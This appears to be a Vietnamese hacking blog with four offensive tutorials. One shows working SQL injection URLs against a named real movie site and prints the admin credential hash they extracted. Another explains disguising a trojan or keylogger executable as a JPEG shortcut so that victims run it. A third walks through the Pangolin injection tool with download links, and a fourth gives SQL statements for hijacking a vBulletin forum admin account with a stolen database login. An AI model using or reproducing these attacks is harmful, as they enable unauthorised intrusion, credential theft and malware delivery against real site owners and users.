Social Icons

Thứ Hai, 13 tháng 8, 2012

[SQL] Check Phimck.com

Get version

Mã:
http://phimck.com/Phim-Online/'%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(version(),0x7c))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20-.html
Get table: table_user
Mã:
http://phimck.com/Phim-Online/'%20and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7c))+from+information_schema.tables+where+table_schema=database()+limit+12,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- -.html
Get column: user_name và user_password của table_user
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Get data user_name và user_password
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7c,user_name,0x7c,user_password,0x7c)+as+char),0x7e))+from+table_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+.html
và kết quả đây
admin|51d31cdcc6bc148eed78adf4cda28331
readmore...

Thứ Sáu, 3 tháng 8, 2012

Ẩn .EXE thành .JPG


Đây là một thủ thuật tốt để ẩn các tập tin .exe của bạn thành một file .jpg ..!
 Làm thế nào về việc gửi một trojan hay keylogger vào nạn nhân bằng cách sử dụng thủ thuật này ..?

1) Thứ nhất, tạo ra một thư mục mới và chắc chắn rằng tùy chọn "hiển thị tập tin và thư mục ẩn" được kiểm tra và "ẩn phần mở rộng cho biết loại tập tin" đã được bỏ.
 Về cơ bản những gì bạn cần là để xem các tập tin ẩn và nhìn thấy phần mở rộng
 của tất cả các tập tin của bạn trên máy tính của bạn.

2) Dán một bản sao của máy chủ của bạn vào thư mục mới được tạo ra. chúng ta hãy nói nó được gọi là "server.exe" (đó là lý do tại sao bạn cần phải có phần mở rộng của các tập tin hiển thị, gây ra bạn cần phải xem thông tin thay đổi nó)

3) Bây giờ bạn sẽ thay đổi tên này "server.exe" để bất cứ điều gì bạn muốn, chúng ta hãy nói ví dụ như 'picture.jpeg'
4) Windows sẽ cảnh báo bạn nếu bạn thực sự muốn thay đổi phần mở rộng này từ các file .exe để .jpeg, click YES.
5) Bây giờ tạo ra một phím tắt của 'picture.jpeg' trong cùng một thư mục.
6) Bây giờ bạn có một phím tắt, đổi tên nó thành bất cứ điều gì bạn muốn, ví dụ, 'me.jpeg'.
7) Đi đến tài sản (trên tập tin tôi .jpeg) và bây giờ bạn cần phải thay đổi một số thông tin.
8) Đầu tiên của tất cả các xóa tất cả các văn bản trên lĩnh vực 'Start In' và để nó trống.
9) Sau đó, trên lĩnh vực 'Target bạn cần phải viết đường dẫn để mở các tập tin khác (server.exe được đổi tên thành 'picture.jpeg'), do đó bạn phải viết này:-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'
10) Trường cuối cùng, 'c picture.jpeg' luôn luôn là tên của tập tin đầu tiên. Nếu bạn được gọi là tập tin đầu tiên 'soccer.avi' bạn phải viết 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.
11) Vì vậy, những gì bạn đang làm khi ai đó nhấp vào là 'me.jpeg', một cmd sẽ thực hiện các tập tin khác 'picture.jpeg' và máy chủ sẽ chạy.
12) Trên tập tin 'me.jpeg' (shortcut), đi đến tài sản và bạn có một tùy chọn để thay đổi biểu tượng. Bấm vào đó và một cửa sổ mới sẽ bật lên và bạn phải viết này :-
%SystemRoot%\system32\SHELL32.dll . sau đó nhấn OK.
13) Bạn có thể thiết lập các thuộc tính 'Hidden' cho các tập tin đầu tiên 'picture.jpeg' nếu bạn nghĩ rằng nó tốt hơn để có được một kết nối từ một người nào đó.
14)Nhưng đừng quên một điều, những 2 file luôn luôn phải ở bên nhau trong cùng một thư mục và mục tiêu kết nối với một người nào đó họ phải click vào tạo ra không phím tắt vào tập tin đầu tiên. Vì vậy, đổi tên các tập tin để bất cứ điều gì bạn muốn xem xét con người và kiến thức mà họ có về vấn đề này.
15) Đối với tôi, ví dụ như tôi luôn luôn muốn các phím tắt cho thấy đầu tiên như vậy có thể được các tập tin đầu tiên được mở ra. Vì vậy, tôi đổi tên máy chủ để 'picture2.jpeg' và các phím tắt để 'picture1.jpeg'.
Bằng cách này, các phím tắt sẽ hiển thị đầu tiên. Nếu bạn thiết lập các thuộc tính ẩn cho máy chủ 'picture.jpeg' sau đó bạn không phải bận tâm với những chi tiết này nhưng tôi cảnh báo bạn, các tập tin ẩn sẽ luôn luôn xuất hiện bên trong một tệp tin .Zip hoặc một tập tin .Rar.

16) Vì vậy, cách tốt nhất để gửi những tập tin này lại với nhau để một người nào đó là nén chúng vào Zip hoặc Rar.
17) bên trong Rar hoặc file Zip bạn có thể xem các thuộc tính tập tin và ngay cả sau khi tất cả các công việc này, bạn có thể thấy rằng các phím tắt được công nhận như một phím tắt, nhưng hy vọng người mà bạn gửi thistoo không biết điều đó và sẽ mở nó

 Thưởng thức ...!
readmore...

Tut Hướng dẫn khai thác web lỗi + hack = panglogin

Anh em bắt đầu bật Panglogin lên nào
Anh em vào TOol > vào Injection Digger nha ! Xong nó sẽ hiện lên thế này
Tools panglogin có cái hay là seach từ khóa của anh em cho vào rồi nó tự động seach + check xem site đó có lỗi hay ko > có lỗi thì nó sẽ hiện dấu X màu đỏ






























Khi ra được column rồi > anh em chọn những column nào cần get ra > click vào data để get nha > bước cuối cùng là save > có chữ save ở đó rồi

Những website nào anh em ko đá được anh em thử cho sang thằng sqlhelpper v2.7 nha > Flo thường sài 2 tools này để chiến ^^

Tại mấy bạn cứ bắt mình làm nên rảnh làm tý thui , gọi là làm cho những newbie như mình sài
Anh em lưu ý nha ! ở file tables.txt và columns.txt anh em có thể thêm những tables or columns mà tools ko hỗ trợ


Show chiến lợi phẩm cho anh em xem





Code:
Access
DB2
Informix
MSSQL 2000 with Error
MSSQL 2000 Blind
MSSQL 2005 with Error
MSSQL 2005 Blind
Mysql
Oracle
PostgreSQL
Sqlite3
Sybase
Configuration Save
Bypass firewall advance mode
Report Export
URL operation(replacement or insert)
Data Dumpernew
MD5 Crackernew
Source Code
Prise(in USD

Homepage:
http://www.nosec.org/2009/0920/74.html

http://rapidshare.com/files/309929227/Pangolin.Pro.v3.0.0.1011.rar
http://ceh.vn/Soft/Toolhacker/Pangolin.Pro.v3.0.0.1011.rar
readmore...

Tut hướng dẫn chiếm quyền admin VBB trong data

cách 1: change pass admin trong data
cách 2: change adminpermissions
cách 3: forget pass admin

Yêu cầu:
Có được info data của victim bao gồm:
Code:
$config['Database']['dbname'] = 'forum';
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = '123456';
Hiểu biết sơ về câu lệnh SQL

Đầu tiên ta tôi sẽ nói cho các bạn biết về các dạng mã hóa của một vài forum thông dụng hiện nay như:
Code:
1. phpBB : md5($pass) //ko dùng salt
2. VBB : md5(md5($pass).$salt)
3. IPB : md5(md5($salt).md5($pass))
Với
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).


OK băt đầu thôi:

Cách 1: change pass admin trong data


Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :
Code:
Select * from user
Với lệnh trên thì ta có thể xem dc tất cả user trên 4rum
Nếu 4rum victim có số lượng thành viện cở hơn 3k thì ta dung lệnh

Code:
Select password , salt from user where username='hacker'
Ta dc

Code:
Pass md5 : 5cc70df698ca01c3adb396a08b4873ad
Salt: ?`Y
Q: Tại sao lại phải select from user
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.

Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.

Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong 4rum victim có nhiều admin ma ta ko bít admin nào có quyền superadmin hay rootadmin, hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
A:Bay vào file config.php và tìm các dòng sau

Code:
$config['SpecialUsers']['canviewadminlog']
$config['SpecialUsers']['canpruneadminlog']
$config['SpecialUsers']['superadministrators']
Tìm xem userid của thằng rootadmin hay superadmin là báo nhiêu (Thưởng thì mặt đinh định là userid=1 là rootadmin)

Ta tiếp tục dùung lệnh
Code:
Select password , salt from user where userid=1
Lấy được pass md5 & salt
Vi dụ:
Code:
Pass md5 : eaf1672523371b7736282bbfc2c8b2ac
Salt : 2/D
Tiếp ta dùng lệnh
Update cú pháp thì các bạn có thể tìm hiểu thêm trên google

Code:
Update user set password=’pass md5 của nick mới reg’ ,salt=’ salt của nick mới reg’ where userid=’userid của admin
Câu lệnh hoàn chỉnh như sau:

Code:
Update user set password=’ 5cc70df698ca01c3adb396a08b4873ad’ ,salt=’?`Y’ where userid=’1
5cc70df698ca01c3adb396a08b4873ad là pass md5 của nick hacker
?`Y là salt của nick hacker
1 là userid của thằng admin

Tác dụng của câu lệnh này là
Update pass của thằng admin thành pass của nick mình
ở đây nick hacker có pass là 123456
Để kiểm tra kết quả ta vào 4rum victim đăng nhập bằng nick của thằng admin với password là 123456

Cách 2: Thay phân quyền trong table administrator

ở cách 2 thì không dài và rồm rà như cách 1 .Ta cũng connet vào data victim

dùng lệnh
Code:
update user set usergroupid =’6’ where username=’hacker
tác dung câu lệnh này là nâng quyền cho nick hacker vào group admin
với câu lệnh này nick hacker mới chỉ là admin bình thường … vẫn chưa có toàn quyền trên site victim .
ta tiếp tực dung lệnh
Code:
select * from administrator
với câu lệnh này ta xem dc các userid , adminpermissions, cssprefs còn những table khác ta ko quan tâm
ở đây lại chia ra thêm 2 cách nhỏ:

2.a) Dùng lệnh update
Code:
Update administrator set userid=’userid của nick hacker’ where userid=’userid của admin
Vi dú userid của nick hacker là 5 và userid của nick admin là 1 ta dung lệnh như sau
Code:
Update administrator set userid=’5’ where userid=’1
Thế là nick hacker đã là admin có toàn quyền

2.b) Dùng lệnh INSERT
ở đây ta có info của table administrator như sau
Code:
userid : 1
adminpermissions : 491516
navprefs : NULL
cssprefs :vBulletin_3_CarbonFibre2'
notes : NULL
dismissednews: NULL
languageid : 0
câu lệnh INSERT như sau

Code:
INSERT INTO `4rum`.`administrator` (`userid`, `adminpermissions`, `navprefs`, `cssprefs`, `notes`, `dismissednews`, `languageid`) VALUES ('5', '491516', NULL, ' vBulletin_3_CarbonFibre2', NULL, NULL, '0');
Phân tích câu lệnh

INSERT INTO `4rum`.`administrator` <== INSERT vào table administrator của database tên là 4rum.
Code:
(
`userid` ,
`adminpermissions` ,
`navprefs` ,
`cssprefs` ,
`notes` ,
`dismissednews` ,
`languageid`
)
VALUES (
'5', '2345', NULL , ' vBulletin_3_CarbonFibre2', NULL , NULL , '0' );
<== INSERT colum userid là 5 , adminpermissions là 2345 , cssprefs là vBulletin_3_CarbonFibre2'


Với câu lệnh này ta đã insert userid của nick hacker vào admin (có toàn quyền admin)
(Nếu bạn nào ko hiểu thì có thể tim hiểu thêm trên google)
Xong thử vào admincp của 4rum đăng nhập bằng nick hacker xem thế nào

Cách 3: Forget pass admin

Cách này thì đơn gian hơn 2 cách trên
Cách thức như sau
Vào 4rum victim đặng nhập bằng nick của admin …. Pass thì đánh đại đi
Khi đăng nhâp sai VBB sẽ thông báo và xuất hiện phần nhập mail và lấy lại password
http://victim/4rum/login.php?do=lostpw
nhập email của thằng admin vào rồi nhấp ok
sau đó vào data copy password mã hóa + sail
bỏ vào tool passwordpro
cho crack ở chế độ là số và ngồi đợi …
nếu bạn nào ko muốn đợi thì làm cách này
vào data
update mail của thẳng admin thành mail của mình
khi forget thì nhập mail của mình vào….
Sau khi forget xong vào mail lấy pass

Tut the end
readmore...